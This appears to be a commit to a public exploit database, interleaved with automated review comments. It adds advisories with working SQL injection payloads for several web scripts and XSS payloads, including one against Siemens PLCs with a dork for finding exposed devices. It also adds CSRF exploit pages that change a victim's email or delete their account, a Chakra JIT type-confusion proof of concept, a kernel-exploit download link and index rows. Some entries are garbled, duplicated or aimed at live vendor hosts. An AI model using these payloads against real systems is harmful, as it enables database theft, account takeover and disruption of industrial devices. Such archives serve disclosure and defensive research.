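Review bot: `'Arch' => [ ARCH_X86, ARCH_X64 ]` disagrees with `check`, which returns `CheckCode::Safe` unless `kernel_hardware` includes 'x86_64', and with the description, which lists only x86_64 test results; drop ARCH_X86 or make check accept i686 and document which pre-compiled `chocobo_root` is shipped for it. In `upload_and_compile`, `unless output.blank?` treats any gcc output, warnings included, as a failed compile and aborts with `Failure::Unknown`; test for the produced binary (`file?(path)`) or fail only when the output contains an error. `check` also accepts only `-generic` flavours of the listed 4.4.0 builds; if that is because chocobo_root.c carries per-build offsets, say so in the description so users on other flavours of the same builds understand why they are reported as not vulnerable.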


@ -0,0 +1,12 @@
# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family Versions: V2.X and V3.X.
# Tested on: Kali Linux
# CVE: CVE-2014-2908
http://TargetIp/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=
<http://targetip/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=>"><img
src=x onerror=prompt(1);>&Send=Filter
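Review bot: the PoC URL is unusable as written: it is broken across three lines and a mailer-style duplicate `<http://targetip/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=>` is wedged between `filtervalue=` and the `"><img src=x onerror=prompt(1);>` payload, so a reader cannot tell where the parameter value ends; give one URL with the payload URL-encoded (`%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E`) followed by `&Send=Filter`, and say explicitly that `filtervalue` is the reflected parameter. Since the header ships a Google dork for Internet-exposed PLCs, the entry should also reference the Siemens advisory for CVE-2014-2908 so that readers can check a CPU is still in the affected V2.x/V3.x range before sending anything to it.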


@ -0,0 +1,39 @@
# Exploit Title: NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
Payload: id=5' AND 3563=3563 AND 'HmOW'='HmOW
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
id=5' AND (SELECT 7446 FROM(SELECT
COUNT(*),CONCAT(0x7178707871,(SELECT
(ELT(7446=7446,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rNYc'='rNYc
# Type: AND/OR time-based blind
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=5' AND SLEEP(5) AND 'KdYd'='KdYd
# Type: UNION query
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=-1714' UNION ALL SELECT
NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
WSZd&t=gallery
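Review bot: the UNION payload ends in `WSZd&t=gallery`, but `t` is not a parameter of home-text-edit.php in any of the "Demo" URLs (`?id=5`); it is the parameter of download.php, so this block looks pasted from that advisory and should end at `-- WSZd`. The endpoint sits under `/admin/`, so the header should state whether the injection is reachable without an admin session; as written the impact is unclear. The boolean payload line is also prefixed twice (`# Payload:` followed by `Payload: id=5' ...`).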


@ -0,0 +1,87 @@
# Exploit Title: Zechat 1.5 - 'hashtag' / 'v' SQL Injection / Cross site request forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://bylancer.com
# Version: 1.5
# Tested on: Kali linux
====================================================
# POC 1 : SQLi :
Parameter : hashtag
type : Union based
http://test.com/chat/hashtag?hashtag=[SQL]
# test :
http://test.com/chat/hashtag?hashtag=-1%27%20UNION%20SELECT%20NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20information_schema.columns%20where%20table_schema=schema()%23
# Payload : -1' UNION SELECT
NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()%23
====================================================
Parameter : v
type : time-based blind
test.com/chat/me?action=edit&v=[SQL]
# test : test.com/chat/me?action=edit&v=231 AND sleep(10)%23
# Payload : AND sleep(10)%23
====================================================
# POC 2 : CSRF :
# CSRF vulnerability allows attacker to change user's information.
In this script we have anti-csrf which we can't change user's information
without token.
So we use 'hashtag' parameter to set our encoded payload and bypass csrf
protection : chat/hashtag?hashtag=[We have Reflected XSS here]
# Exploit :
<form action="http://test.com/chat/data_settings.php" method="POST">
<input type="hidden" name="csrf&#95;token" value="" />
<input type="hidden" name="Wall"
value="Hello&#32;would&#32;you&#32;like&#32;to&#32;be&#32;my&#32;friend" />
<input type="hidden" name="user" value="lord225" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="mail"
value="d3code&#46;n&#64;gmail&#46;com" />
<input type="hidden" name="website" value="test" />
<input type="hidden" name="sex" value="male" />
<input type="hidden" name="country"
value="&#45;&#45;&#45;&#45;&#45;&#45;" />
<input type="hidden" name="day" value="" />
<input type="hidden" name="month" value="" />
<input type="hidden" name="year" value="" />
<input type="hidden" name="Language" value="en" />
</form>
<script>
var token = '';
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var setPage = this.responseXML;
token = setPage.forms[1].elements[0].value; // get token
console.log(token);
}
}
req.open("POST","/chat/settings",true);
req.setRequestHeader("content-type","application/x-www-form-urlencoded");
req.responseType = "document";
req.send();
document.forms[0].elements[0].value = token; // set token to our form
document.forms[0].submit();
</script>
=====================================================
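Review bot: the CSRF exploit submits the form before the token has arrived: `req.open("POST","/chat/settings",true)` is asynchronous, and `document.forms[0].elements[0].value = token; document.forms[0].submit();` run immediately after `req.send()`, while `token` still holds the empty string from `var token = '';`; move those two lines into the `readyState == 4` callback after `token = setPage.forms[1].elements[0].value`. Because the token is read from a same-origin response, the whole chain only works from the reflected XSS in `hashtag` that the text mentions, so the title should list Cross-Site Scripting next to SQL Injection / CSRF and the XSS payload should be shown instead of `[We have Reflected XSS here]`.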


@ -0,0 +1,10 @@
# Exploit Title: WebSocket Live Chat - Cross-Site Scripting
# Date: 2018-05-22
# Exploit Author: Alireza Norkazemi
# Vendor Homepage: https://codecanyon.net/item/websocket-live-chat-instant-messaging-php/16545798?s_rank=1
# POC :
1) Create your account and click setting icon and go to profile
2) Put this payload into Status box :
<script>alert('xss')</script>
3) The payload will be executed if someone opens your profile
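Review bot: the header has no "Version" or "Tested on" line, so the affected release of WebSocket Live Chat cannot be determined from this entry; add the version tested. Step 3 describes stored XSS (the payload fires when another user opens the profile), which the title's plain "Cross-Site Scripting" does not convey.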


@ -0,0 +1,27 @@
# Exploit Title: PaulPrinting CMS Printing 1.0 - SQL Injection
# Exploit Date: 2018-05-19
# Software Link: https://codecanyon.net/item/paulprinting-cms-printing-solutions/19546365
# Author: Mehmet Onder Key
# Version: 1.0
# Tested On: Linux
# 1. Description
# Any visitor can run code to exploit css and sql vulnerabilities in the
# products and order sections.
# 2. Proof of Concept
# Example parameter with demo site : http://demo.codepaul.com/
# printing/products/businesscard?pricelist=1&format=90x50&pages=2p4cf&
# paper=300g_ma&refinement=lamco
# Time-Based Blind SQL Payload:
format=keyney+akkus') OR SLEEP(5)-- DLea
# Boolean-Based Blind SQL Payload:
refinement=were') OR NOT 4134=4134#
# Error-Based SQL Payload
paper=here') OR (SELECT 1712 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT
(ELT(1712=1712,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- oXDz
etc... (all parameter is effected -pricelist)
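Review bot: the description says visitors can exploit "css and sql vulnerabilities", but only SQL payloads follow and the title claims SQL Injection alone; either drop the XSS claim or add its parameter and payload. `etc... (all parameter is effected -pricelist)` is ambiguous: state explicitly whether `pricelist` is the one parameter that is not injectable or the one that is. The example URL points at the vendor's live demo (demo.codepaul.com); replace the host with a placeholder.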


@ -0,0 +1,51 @@
# Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2
# Version: 1.2.0
# Tested on: Kali linux
# POC 1 : Cross-Site scripting:
1) Create your account and navigate to "write post".
2) Put this payload and click on "post" :
<script>alert(document.cookie)</script>
3) You will have an alert box in your page .
# POC 2 : Cross-Site Scripting:
1) Navigate to "Albums" and click on "create album"
2) In title field , put this payload :
"/><script>alert(document.cookie)</script>
3) In both cases , the payload will be executed after someone opens your
album or your profile.
# POC 3 : Cross-Site Request Forgery:
# iSocial - Social Network Platform 1.2.0 suffers from csrf vulnerability .
# Attacker can easily change user's email or delete user's account .
# Change email Exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://Target/isocial/demo/services/actionssetting/email" method="POST">
<input type="hidden" name="em" value="lord2&#64;gmail&#46;com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Result :
# html "The information has been updated"
# status "OK"
# message ""
# Delete account Exploit:
<img src="
http://Target/isocial/demo/services/actionssetting/delete">
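Review bot: the delete-account PoC (`<img src=" http://Target/isocial/demo/services/actionssetting/delete">`) shows that account deletion happens on a plain GET with no token and no confirmation, which is the more severe of the two CSRF findings and deserves its own sentence in the description rather than a bare tag at the end; also put the URL on the same line as `src="`, since the leading newline inside the attribute only works because browsers strip it. POC 1 and POC 2 both describe stored XSS (step 3: executed after someone opens your album or profile), so label them as stored rather than as generic XSS.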


@ -0,0 +1,54 @@
# Exploit Title: Auto car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/auto-car-car-listing-script/19221368?s_rank=1159
# Version: 1.2
# Tested on: Win 10
# POC 1: SQLi:
# Parameter: car_title
# Type: Error based
# Payload: 1' and extractvalue(1,Concat(0x3a,user(),0x3a))#
# test: http://target/scripts/autocar_preview/
# Request:
POST /scripts/autocar_preview/search-cars HTTP/1.1
Host: kamleshyadav.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://kamleshyadav.com/scripts/autocar_preview/
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Connection: keep-alive
Upgrade-Insecure-Requests: 1
car_title=1' and extractvalue(1,Concat(0x3a,user(),0x3a))#
# Response:
HTTP/1.1 500 Internal Server Error
Server: nginx/1.12.2
Date: Tue, 22 May 2018 14:36:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1371
Connection: keep-alive
<h1>A Database Error Occurred</h1>
<p>Error Number: 1105</p><p>XPATH syntax error:
':kamleshy_event@localhost:'</p><p>SELECT
*
FROM `autocar_car_details`
WHERE `car_status` = 1 AND `car_title` LIKE '%1' and
extractvalue(1,Concat(0x3a,user(),0x3a))#%'</p>
# POC 2: Cross site scripting:
1) Create your account and navigate to "edit profile"
2) Put this payload in "name" and update your profile:
<script>alert('xss')</script>
3) You will have an alert box in your page .
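Review bot: the request/response pair is captured against a live third-party host (`Host: kamleshyadav.com`) and the error text reproduces its database account (`kamleshy_event@localhost`); redact both to the `http://target/` placeholder already used on the "test:" line. The response is otherwise a useful record: it shows the value lands inside `LIKE '%1' and extractvalue(...)#%'`, i.e. a LIKE pattern, which is why the trailing `#` is needed to discard the `%'`. The XSS in "name" is stored (rendered on the profile), not reflected, so say so.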


@ -0,0 +1,39 @@
# Exploit Title: NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
iPayload: id=5' AND 3563=3563 AND 'HmOW'='HmOW
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
id=5' AND (SELECT 7446 FROM(SELECT
COUNT(*),CONCAT(0x7178707871,(SELECT
(ELT(7446=7446,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rNYc'='rNYc
# Type: AND/OR time-based blind
# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=5' AND SLEEP(5) AND 'KdYd'='KdYd
# Type: UNION query
# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=-1714' UNION ALL SELECT
NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
WSZd&t=gallery
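Review bot: this file is the same advisory as the earlier NewsBee 'home-text-edit.php' entry in this commit: identical title, date, demo path and payloads down to the sqlmap suffixes (HmOW, rNYc, KdYd, WSZd), differing only in the `Target` capitalisation and the `iPayload:` typo on the boolean payload line. One of the two should be dropped, or, if this one was meant to cover a different script, the title and demo URL need to name it.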


@ -0,0 +1,22 @@
# Exploit Title: Feedy RSS News Ticker 2.0 - 'cat' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/feedy-rss-news-ticker/5818277
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: cat
# Type: boolean-based blind
# Demo: http://target/feedy/category.php?cat=
# Payload:
cat=akkus+keyney' AND 2367=2367 AND 'NKyC'='NKyC
# Type: AND/OR time-based blind
# Demo: http://demo.cudevo.com/feedy/category.php?cat=1
# Payload:
cat=akkus+keyney' AND SLEEP(5) AND 'AEHg'='AEHg
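Review bot: the two "Demo" lines disagree: the boolean case uses the placeholder `http://target/feedy/category.php?cat=` while the time-based case points at the vendor's live demo `http://demo.cudevo.com/feedy/category.php?cat=1`; use the placeholder for both. The `akkus+keyney` prefix in both payloads is the tester's marker and not part of the injection; `cat=1' AND SLEEP(5) AND 'AEHg'='AEHg` is the clearer form.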


@ -0,0 +1,62 @@
# Exploit Title: NewsBee CMS 1.4 - 'download.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578' AND 2043=2043 AND 'KzTm'='KzTm&t=gallery
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
id=578' AND (SELECT 7126 FROM(SELECT
COUNT(*),CONCAT(0x7162787871,(SELECT
(ELT(7126=7126,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hOBA'='hOBA&t=gallery
# Type: AND/OR time-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578' AND SLEEP(5) AND 'KlSV'='KlSV&t=gallery
# Type: UNION query
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=-1714' UNION ALL SELECT
NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
WSZd&t=gallery
# PoC: SQLi:
# Parameter: t
# Type: boolean-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578&t=gallery` WHERE 7854=7854 AND 1059=1059#
# Type: error-based
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578&t=gallery` WHERE 8962=8962 AND (SELECT 1892 FROM(SELECT
COUNT(*),CONCAT(0x7162787871,(SELECT
(ELT(1892=1892,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- eLUC
# Type: AND/OR time-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578&t=gallery` WHERE 5549=5549 AND SLEEP(5)-- RUaY
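Review bot: the `t` payloads close a backtick (`t=gallery\` WHERE 7854=7854 ...`), which means `t` is interpolated as an identifier (the table name in the FROM clause), not as a quoted value like `id`; the advisory should say so, because it changes the fix: a prepared-statement parameter cannot bind a table name, so `t` needs an allow-list of permitted tables while `id` needs a bound parameter. The `id` UNION payload (`id=-1714' UNION ALL SELECT ... -- WSZd`) is identical to the one in the home-text-edit.php advisory in this commit, including the 12-column layout; plausible if both scripts run the same query, but worth confirming against download.php rather than copying.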


@ -0,0 +1,48 @@
# Exploit Title: Easy File Uploader 1.7 - SQL Injection / Cross-Site
Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux
# Description : Non-authorized users can perform the attack in the editing
area.
====================================================
# PoC : SQLi :
Parameter : id
Type : boolean-based blind
Demo :
http://test.com/EasyFileUploader/settings-users-edit.php?id=1
Payload : id=1' RLIKE (SELECT (CASE WHEN (7769=7769) THEN 27 ELSE 0x28
END))-- wKWi
Type : error-based
Payload : id=1' AND (SELECT 6379 FROM(SELECT
COUNT(*),CONCAT(0x717a627671,(SELECT
(ELT(6379=6379,1))),0x7178707071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ATeG
Type : AND/OR time-based blind
Demo :
http://test.com/EasyFileUploader/settings-users-edit.php?id=1
Payload : id=1' AND SLEEP(5)-- gTLZ
Type : UNION query
Demo :
http://test.com/EasyFileUploader/settings-users-edit.php?id=1
Payload : id=-3300' UNION ALL SELECT
NULL,NULL,CONCAT(0x717a627671,0x79556745594846426c69514d71737744775a6450464a5963786658766171476f447a79684675714a,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL#
====================================================
# PoC : XSS :
Payload :
http://test.com/EasyFileUploader/settings-users-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98
;
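Review bot: `# Version: 1.4 / fourth update` contradicts the title's "Easy File Uploader 1.7" and is the version line from the NewsBee advisories in this commit; replace it with the version actually tested. The XSS URL ends in `%E2%80%98` (U+2018, a curly single quotation mark) with a stray `;` on the next line, which looks like a word processor's smart-quote substitution for the closing `'`; give the payload in ASCII, e.g. `id=%27%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E%27`. "Non-authorized users can perform the attack in the editing area" should say "unauthenticated" if that is what was tested, since the endpoint is settings-users-edit.php.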


@ -0,0 +1,33 @@
/*
BOOL JavascriptNativeFloatArray::SetItem(uint32 index, double dValue)
{
if (*(uint64*)&dValue == *(uint64*)&JavascriptNativeFloatArray::MissingItem)
{
JavascriptArray *varArr = JavascriptNativeFloatArray::ToVarArray(this);
varArr->DirectSetItemAt(index, JavascriptNumber::ToVarNoCheck(dValue, GetScriptContext()));
return TRUE;
}
this->DirectSetItemAt<double>(index, dValue);
return TRUE;
}
As you can see above, if the double value given as the parameter equals to JavascriptNativeFloatArray::MissingItem, it converts the float array to a var array. Since the input value is not checked in the JITed code, it can lead to type confusion.
*/
function opt(arr, value) {
arr[1] = value;
arr[0] = 2.3023e-320;
}
function main() {
for (let i = 0; i < 0x10000; i++)
opt([1.1], 2.2);
let arr = [1.1];
opt(arr, -5.3049894784e-314); // MAGIC VALUE!
print(arr);
}
main();
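Review bot: `print(arr)` is the ChakraCore test host's (`ch`) output builtin; in a browser the same call is `window.print()`, which opens a print dialog, so the PoC as written only reproduces under `ch` and the text should say so, along with the expected result (e.g. a crash on access to the confused array). The quoted SetItem source explains the MissingItem check that the JIT-ed store skips, but neither constant in the script is explained: the comment marks `-5.3049894784e-314` as the MissingItem value, and `2.3023e-320` in `opt` is not explained at all; a comment with the hex bit pattern of each would let a reader verify the magic value against JavascriptNativeFloatArray::MissingItem in the source.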


@ -0,0 +1,7 @@
Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.
- KVA Shadowing should be disabled and the relevant security update should be uninstalled.
- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44697.zip
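Review bot: the README states the environment (KVA shadowing disabled, the CVE-2018-8897 security update uninstalled, not under hypervisors that drop the pending #DB after INT3) but not the Windows build the demo was run on or what "unsigned code execution with kernel privileges" produces when it works, and the only artefact is a binary zip; add the tested build and a short description of the zip's contents so the result can be reproduced. Typo: "privilages".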


@ -5974,6 +5974,9 @@ id,file,description,date,author,type,platform,port
44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios,
44641,exploits/linux/dos/44641.c,"Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall",2018-05-17,"Google Security Research",dos,linux,
44653,exploits/windows/dos/44653.js,"Microsoft Edge Chakra JIT - Bound Check Elimination Bug",2018-05-18,"Google Security Research",dos,windows,
44693,exploits/linux/dos/44693.py,"Siemens SIMATIC S7-1500 CPU - Remote Denial of Service",2018-05-22,t4rkd3vilz,dos,linux,
44694,exploits/windows/dos/44694.js,"Microsoft Edge Chakra JIT - Magic Value Type Confusion",2018-05-22,"Google Security Research",dos,windows,
44695,exploits/hardware/dos/44695.c,"AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass",2018-05-22,"Google Security Research",dos,hardware,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
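Review bot: 44693 (the S7-1500 DoS) is filed as platform `linux`, which reflects the Kali box it was run from rather than the target, while 44695 in the same hunk and the device entries elsewhere in this file (44637 Intelbras, 44657 D-Link) use `hardware`; the port column is also empty although the PoC targets TCP/102. `exploits/linux/dos/44693.py` would need to move along with the platform change.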
@ -9724,6 +9727,10 @@ id,file,description,date,author,type,platform,port
44658,exploits/windows/local/44658.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)",2018-05-20,"Juan Prescotto",local,windows,
44677,exploits/linux/local/44677.rb,"Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)",2018-05-21,Metasploit,local,linux,
44680,exploits/windows_x86/local/44680.py,"R 3.4.4 - Local Buffer Overflow (DEP Bypass)",2018-05-21,"Hashim Jawad",local,windows_x86,
44688,exploits/linux/local/44688.txt,"Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read",2018-05-22,"Paul Taylor",local,linux,
44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android,
44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux,
44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
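Review bot: 44688 (Dell EMC RecoverPoint boxmgmt file read) is filed as `local`, but the advisory's PoC is performed over an SSH login with default credentials (boxmgmt/boxmgmt), and the remote entries in the context lines carry a port (80, 80, 139); if `local` is meant as "post-authentication" it is consistent with the rest of the file, otherwise `remote` with port 22 would describe the entry better.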
@ -39330,7 +39337,8 @@ id,file,description,date,author,type,platform,port
44624,exploits/php/webapps/44624.txt,"MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery",2018-05-16,0xB9,webapps,php,
44625,exploits/php/webapps/44625.txt,"VirtueMart 3.1.14 - Persistent Cross-Site Scripting",2018-05-16,"Mattia Furlani",webapps,php,
44626,exploits/windows/webapps/44626.txt,"Rockwell Scada System 27.011 - Cross-Site Scripting",2018-05-16,t4rkd3vilz,webapps,windows,
44627,exploits/php/webapps/44627.txt,"Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting",2018-05-16,L0RD,webapps,php,
44627,exploits/php/webapps/44627.txt,"Multiplayer BlackJack Online Casino Game 2.5 - Cross-Site Scripting",2018-05-16,L0RD,webapps,php,
44685,exploits/php/webapps/44685.txt,"Zechat 1.5 - SQL Injection / Cross-Site Request Forgery",2018-05-22,L0RD,webapps,php,
44628,exploits/linux/webapps/44628.txt,"Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery",2018-05-16,L0RD,webapps,linux,
44631,exploits/asp/webapps/44631.html,"totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery",2018-05-16,"Compass Security",webapps,asp,
44632,exploits/php/webapps/44632.html,"WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery",2018-05-16,dxw,webapps,php,80
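Review bot: the 44627 line is replaced only to drop "Persistent" from the title, which removes the stored-versus-reflected distinction the entry used to carry; if titles are being normalised, the new scheme should still record stored XSS somewhere. The added 44685 (Zechat) line is inserted between 44627 and 44628, out of the ID order the surrounding lines follow, and its title omits the reflected XSS in `hashtag` on which that advisory's CSRF bypass depends.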
@ -39339,7 +39347,7 @@ id,file,description,date,author,type,platform,port
44637,exploits/hardware/webapps/44637.py,"Intelbras NCLOUD 300 1.0 - Authentication bypass",2018-05-17,"Pedro Aguiar",webapps,hardware,
44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php,
44640,exploits/linux/webapps/44640.txt,"Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery",2018-05-17,t4rkd3vilz,webapps,linux,
44645,exploits/php/webapps/44645.txt,"Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php,
44645,exploits/php/webapps/44645.txt,"Healwire Online Pharmacy 3.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php,
44646,exploits/php/webapps/44646.txt,"Monstra CMS before 3.0.4 - Cross-Site Scripting",2018-05-18,"Berk Dusunur",webapps,php,
44647,exploits/linux/webapps/44647.txt,"SAP NetWeaver Web Dynpro 6.4 < 7.5 - Information Disclosure",2018-05-18,"Richard Alviarez",webapps,linux,
44651,exploits/php/webapps/44651.txt,"Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php,
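Review bot: the second 44645 row renames the Healwire title from "Persistent Cross-Site Scripting / Cross-Site Request Forgery" to "Cross-Site Scripting / Cross-Site Request Forgery", dropping the "Persistent" qualifier, while the neighbouring 44639 row still reads "Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass"; naming and capitalisation are now inconsistent within the same block. Pick one convention (including consistent capitalisation of "Scripting" and "Cross-Site Request Forgery") and apply it to both rows.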
@ -39348,18 +39356,30 @@ id,file,description,date,author,type,platform,port
44657,exploits/hardware/webapps/44657.txt,"D-Link DSL-3782 - Authentication Bypass",2018-05-20,"Giulio Comi",webapps,hardware,
44661,exploits/php/webapps/44661.txt,"Superfood 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
44660,exploits/php/webapps/44660.txt,"Joomla! Component EkRishta 2.10 - Cross-Site Scripting / SQL Injection",2018-05-20,"Sina Kheirkhah",webapps,php,
